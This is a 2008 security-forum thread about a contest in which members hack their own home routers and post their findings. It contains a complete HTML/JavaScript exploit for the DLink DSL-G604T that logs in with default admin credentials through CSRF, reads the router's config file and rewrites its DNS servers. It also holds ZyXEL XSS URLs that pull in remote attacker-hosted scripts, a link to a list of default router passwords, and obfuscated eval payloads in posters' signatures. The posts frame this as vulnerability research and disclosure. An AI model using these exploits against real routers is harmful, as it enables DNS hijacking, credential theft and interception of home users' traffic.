I decided to put up a little challenge.

I'm intrigued by router issues, the folks at gnucitizen have submitted numerous router exploits in the last months. Problem is, they hack their own router brand. Something I cannot test myself because I don't own it. Since I'm always short on the green, I thought it would be a good idea for each of us to inspect and pentest our own router. This way we can figure out how severe the router vulnerability landscape really is. The incentive is that you'll learn hacking routers, and this way you get something out of it also. So are you up to it? can you handle it? can you find a vulnerability in your personal router? Then you are the perfect candidate to join!

The contest runs from 2 February until 29 February. If there are enough submissions, I will write about it and compose a list of the best router hacks that where submitted. I also pick my personal favorite out of that list as the main winner. The Hacker Webzine currently grows each day. The site has 100 to 150K hits each week, so this can give you a lot of attention and spotlight! The rules are very flexible, every kind of exploit is allowed. From buffer overflows to CSRF issues that plague many routers. My personal favorites are CSRF issues since they always work in any situation.

You can submit your entries to this email: hackerwebzine[at]gmail[dot]com.

Happy router hacking!

For some inspiration, you can visit gnucitizen.org or take a look at this example that shows a CSRF issue that was discovered last week on the 2Wire router brand:

2Wire Routers 'H04_POST' Access Validation Vulnerability.
[127.0.0.1]

The challenge post is here: [www.0x000000.com]



Edited 3 time(s). Last edit at 02/02/2008 09:25AM by Ronald.

Great idea!

Only one little problem though, we have to trust you with information lol

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Yeah I understand, I also post my submission so I'm not that affraid actually. If I can find one ofcourse. :) but on the other hand, if routers are vulnerable and your brand is in it, it probably is know already and probably used.

But the flip-side is that you'll get to know your own router issues, and maybe protect it, like adjusting the routers firewall settings. :)

@Ronald

2 mins after I checked, I could read /etc/passwd from the web interface lol. I think you need to make the challenge harder like unauthenticated access

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Ronald, I think that this is an excellent idea and we are also interesting to facilitate it in any possible way. So, apart from featuring the stuff to 0x000000 we can also feature it on GNUCITIZEN or even better, construct one mega fat router hacking paper - a paper that is written from the community for the community. So what do u think?

PDP, sounds good!

If you want to compose a post on gnucitizen that would be fine with me. It also broaden the number of people involve I guess. Can you let me know how you are going to pick this up? if so, I can adjust my post about it and direct it to yours.

sure, ok... first I need a post, which I will be done with by the end of today, and then i will let you know. then, I will contact some friends to spread the word. it will be fun. :) let's see what will happen.

here you go, [www.gnucitizen.org]

Well, I still have to check several things one more time, but I think, that I can turn my SOHO router into a sniffer for WAN <=> LAN/WLAN, LAN <=> LAN, WLAN <=> WLAN and WLAN <=> LAN traffic.
And you can do this attack from a remote location. ;)

And it's a wide spread product ...

---
~~Patching is for suckers~~

[www.bitsploit.de]

there you go, post it! we want to hear about it.

I've had some fun with my router: LinkSys WRT300N Firmware Version: 2.00.20
Basically it uses XSS, the user does need to be logged into the admin area of the router for this to work.

This will fetch the username/password of my PPPoE login, but with small modifications you can steal/adjust anything you want.

Does not work in IE, probably some small problem but I don't use IE so whatever.
Firefox and Safari are ok.

Html file:
[code.bulix.org]

Javascript file:
[code.bulix.org]

new entry over here:

[www.gnucitizen.org]

@dzman nice1!

I have the same issue for my Zyxel router, I only need a xss hole to make it more serious.

btw here is a file with default router passes if anyone needs them:
[www.phenoelit-us.org]

two more entries from loftgaia:

[www.gnucitizen.org]
[www.gnucitizen.org]

he continues to prove that he can successfully hack into his router. Hack your router! You cannot get a safer challenge then that.

Good stuff, that's exactly why it's a fun challenge, people get to know their own security issues. I already learned quite a bit on my router and how to secure it further.

I learned I need to buy a new router. I'll post my stuff soon :)

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

we count on you Gareth! :)

post removed on demand

Greetings,
.mario

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>



Edited 3 time(s). Last edit at 02/13/2008 08:46AM by .mario.

Ok, before I can finish my attack for turning my router into a sniffer from the outside, I need a little help from you guys.
The router's webserver instructs my webbrowser to save the content instead of just displaying it as a normal text file.
Is there any solution for another website to save that content ? Maybe I've a mental block now ...

I need anti dns-dinning for doing that job and I don't have a root server to check it the right way from the Internet. So I can't test it on my own.
That's why I'm releasing more info in my next posting.

But now I've to figure out where my before-0-day XSS vulnerability in Serendipity weblog software exists in the code (core or plugin) first. ;)
For those who are interested: [www.bitsploit.de]

BTW: You can sniff some PPP LC traffic between your ADSL-router and the DSLAM or BRAS (?!) next to it.

---
~~Patching is for suckers~~

[www.bitsploit.de]



Edited 2 time(s). Last edit at 02/13/2008 07:08AM by Alex.

new submission over here:

[www.gnucitizen.org]

I finally sat down and wrote a POC for my router, it's a DLink DSL-G604T. It's probably going in the bin after this :) I can read any file on the router remotely and the entire thing can be CSRF'd to death. In the sample code I show how to read the config file (or any other file) and change the DNS settings to anything you like.

<html>
<head>
<title>DLink DSL-G604T Exploit</title>
<script>
function readConfig() {
	login();
	setTimeout(function() {
		xss('"><iframe src="http://192.168.1.1/cgi-bin/webcm?getpage=/etc/config.xml" onload="alert(this.contentWindow.document.body.innerHTML);">');
	}, 2000);
}
function xss(payload) {
	ifrm = document.getElementById('iframe');
	ifrm.contentWindow.location = 'http://192.168.1.1/cgi-bin/webcm?getpage=../html/advanced/portforw.htm&var:pagename=fwan&var:category='+payload;
}
function login() {
	var f = document.createElement('form');
	f.action = 'http://192.168.1.1/cgi-bin/webcm';
	f.innerHTML = '<input type="hidden" name="getpage" value="../html/home.htm"><input type="hidden" name="errorpage" value="../html/index.html">';
	f.innerHTML += '<input type="hidden" name="login:command/username" value="admin"><input type="hidden" name="login:command/password" value="admin">';
	f.innerHTML += '<input type="hidden" name="var:errormsg" value="Error">';
	f.target = 'iframe';
	f.method = 'post';
	document.body.appendChild(f);
	f.submit();
}
function post(url, fields) {
	var p = document.createElement('form');
	p.action = url;
	p.innerHTML = fields;
	p.target = 'iframe';
	p.method = 'post';
	document.body.appendChild(p);
	p.submit();	
}
function changeDNS(server) {
	login();
	setTimeout(function() {
		var fields = '<input type="hidden" name="getpage" value="../html/setup/dns.htm">';
		fields += '<input type="hidden" name="resolver:settings/nameserver1" value="'+server+'">';
		fields += '<input type="hidden" name="resolver:settings/nameserver2" value="'+server+'">';
		fields += '<input type="hidden" name="dproxy:settings/state" value="2">';
		post('http://192.168.1.1/cgi-bin/webcm',fields);
	}, 2000);
	setTimeout(function() {
		post('http://192.168.1.1/cgi-bin/webcm','<input type="hidden" name="logic:command/save" value="../html/tools/syscommnd.htm">');
	},5000);
}
window.onload = function() {
	//readConfig();
	changeDNS('2.2.2.2');
}
</script>
</head>
<body>
<iframe name="iframe" id="iframe"></iframe>
</body>
</html>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

A while back I also collected the default IP address settings for many routers/adsl modems, using this information it's possible to get the LAN address of the router using Javascript or CSS:-

Javascript version:-
[www.businessinfo.co.uk]

CSS version:-
[www.businessinfo.co.uk]

Obviously not foolproof (if you change the default address) but interesting nevertheless.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

new entry over here: [www.gnucitizen.org]

you can get automatic notifications for new entries over here:

[www.gnucitizen.org]

I'm using a ZyXEL P-660HW Series [www.zyxel.com] . There are a lot of CSRF stuff on this router, it can be used to change DNS servers, add keywords to bannedlist on URL, it's also affected by the IP-based session management attacks mentioned on gnucitizen, and to authenticate you only need a password, which by default is 'admin', I created two simple proof of concepts abusing a XSS flaw which requires the user to be logued on.

hxtp://192.168.1.1/Forms/DiagGeneral_2?PingIPAddr=d=%3Cscript%20src%3Dhttp:%2f%2fbeford.org%2fstuff%2fr1.js%3E%3C%2fscript%3E
hxtp://192.168.1.1/Forms/DiagGeneral_2?PingIPAddr=d=%3Cscript%20src%3Dhttp:%2f%2fbeford.org%2fstuff%2fr2.js%3E%3C%2fscript%3E

Javascript source code, and two screenshots for reference:
src: [beford.org] shot: [beford.org]
src: [beford.org] shot: [beford.org]

The first step in avoiding a trap is knowing of its existence.

-- Mentat Tufir Hawat.


The first step in hacking someone is knowing their router model.

-- Tinfoil-Hatter



In other words, I ain't gonna tellsya my router vulns. But I'll tellsya it protects itself with HTTP-Auth. That's good, right?

@EWSec

It's a Netgear DG834, right?

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@Gareth,

TP-Link Wifi thingy.... I googled to see if there is a relationship with Netgear, one page said it's actually a Netgear brand, but the funny thing is that Google warned me not to visit tp-link.com as it may contain malware....

Ok, now THAT got my attention. Is there a known vuln with these toys?

@EWSec
in fact, the best protection is when you can't access your own router anymore, e.g. block port 80 traffic, only way to regain service would be a full reset. Since no-one should be able to see, finger or touch the router.

I am going to add:

* unplug your router and throw it to the bin
* disconnect from the internet
* use pigeons for data transfer

yes it is slow and yes they are vulnerable to guns and food poisoning but attackers are not aware of this yet. so it should work for all of us. I think that there is a RFC for it as well. Look for IP over Pigeons.